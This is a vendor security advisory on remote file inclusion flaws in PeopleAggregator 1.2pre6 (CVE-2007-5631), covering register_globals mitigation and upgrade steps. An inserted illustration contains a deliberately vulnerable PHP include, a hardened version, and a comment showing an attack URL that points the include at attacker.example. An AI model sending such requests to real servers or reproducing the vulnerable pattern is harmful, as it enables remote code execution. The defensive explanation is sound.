PeopleAggregatory security advisory - re CVE-2007-5631

Hi all,

This is a notification that the remote file inclusion vulnerabilities reported
in CVE-2007-5631 have been fixed in PeopleAggregator v1.2pre6-release-55. They
are only exploitable when PHP's register_globals directive is enabled.

CVE entry:

Multiple PHP remote file inclusion vulnerabilities in PeopleAggregator 1.2pre6
allow remote attackers to execute arbitrary PHP code via a URL in the
current_blockmodule_path parameter to (1)
AudiosMediaGalleryModule/AudiosMediaGalleryModule.php, (2)
ImagesMediaGalleryModule/ImagesMediaGalleryModule.php, (3)
MembersFacewallModule/MembersFacewallModule.php, (4)
NewestGroupsModule/NewestGroupsModule.php, (5)
UploadMediaModule/UploadMediaModule.php, and (6)
VideosMediaGalleryModule/VideosMediaGalleryModule.php in BetaBlockModules/; and
(7) the path_prefix parameter to several components.

Notes from vendor: To be exploitable, the web server must be configured with
PHP's register_globals directive ON.  To fix a vulnerable installation, either
turn register_globals OFF (in php.ini, or with Apache's php_flag directive in
httpd.conf or .htaccess), or upgrade to v1.2pre6-release-55.
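To make the vendor's note concrete, here is an added illustration of the register_globals inclusion pattern behind this class of bug, and of a hardened replacement. It is not PeopleAggregator's code: the module layout, file names and function names are hypothetical, and only the parameter name current_blockmodule_path and the BetaBlockModules/ directory come from the CVE text.

```php
<?php
// Added illustration of the register_globals remote file inclusion pattern
// behind CVE-2007-5631. NOT PeopleAggregator's code: the module layout and
// function names are hypothetical; only the parameter name
// current_blockmodule_path and the BetaBlockModules/ directory come from the CVE.

// --- Vulnerable pattern -----------------------------------------------------
// A module file that expects the framework to have set
// $current_blockmodule_path before including it. With register_globals = On,
// PHP creates a global variable for every request parameter, so requesting
//   /BetaBlockModules/X/X.php?current_blockmodule_path=http://attacker.example/m
// pre-sets the variable and the include below fetches and executes
// http://attacker.example/m/blockmodule.php (when allow_url_fopen, and on
// PHP >= 5.2 also allow_url_include, permit URL includes).
function vulnerable_module_include()
{
    global $current_blockmodule_path;   // assumed to be set by the framework
    require_once $current_blockmodule_path . '/blockmodule.php';
}

// --- Hardened pattern -------------------------------------------------------
// Do not depend on a variable the request can populate. Derive the path from
// a fixed base directory and accept only a plain module name.
define('BLOCKMODULE_BASE', realpath(__DIR__ . '/BetaBlockModules'));

function safe_module_include($module)
{
    if (BLOCKMODULE_BASE === false) {
        throw new RuntimeException('BetaBlockModules directory is missing');
    }
    // Allow-list: letters and digits only, so no "/", "..", ":" or "http://".
    if (!preg_match('/^[A-Za-z0-9]+$/', $module)) {
        throw new InvalidArgumentException('Bad module name');
    }
    $path = realpath(BLOCKMODULE_BASE . '/' . $module . '/' . $module . '.php');

    // realpath() resolves symlinks and returns false for a missing file; the
    // prefix check rejects anything that resolved outside the base directory.
    if ($path === false || strpos($path, BLOCKMODULE_BASE . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException("Module not found: $module");
    }
    require_once $path;
}

// --- Deployment check -------------------------------------------------------
// True when register_globals is off, or absent entirely (PHP 5.4 removed the
// directive, and ini_get() returns false for a directive that does not exist).
function register_globals_is_off()
{
    $value = ini_get('register_globals');
    return $value === false || !filter_var($value, FILTER_VALIDATE_BOOLEAN);
}

if (PHP_SAPI === 'cli') {
    echo register_globals_is_off()
        ? "register_globals: off\n"
        : "register_globals: ON - vulnerable to this class of bug\n";
}
```

Two things worth checking on a live host: `php -i | grep register_globals` (or the check function above run through the same SAPI Apache uses, since php.ini settings can differ between CLI and mod_php) confirms the directive is really off after editing php.ini or adding `php_flag register_globals Off`; and note that turning off allow_url_include only blocks the remote variant, which is why the hardened version also refuses local paths rather than relying on that setting alone.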

Advisory blog post:

Upgrade instructions:

- If installed via Subversion, 'svn update' in the root of your PeopleAggregator

- If installed via tarball, download the latest tarball from
55.tar.gz and copy all files over those from your existing installation.

Phillip Pearson
Broadband Mechanics
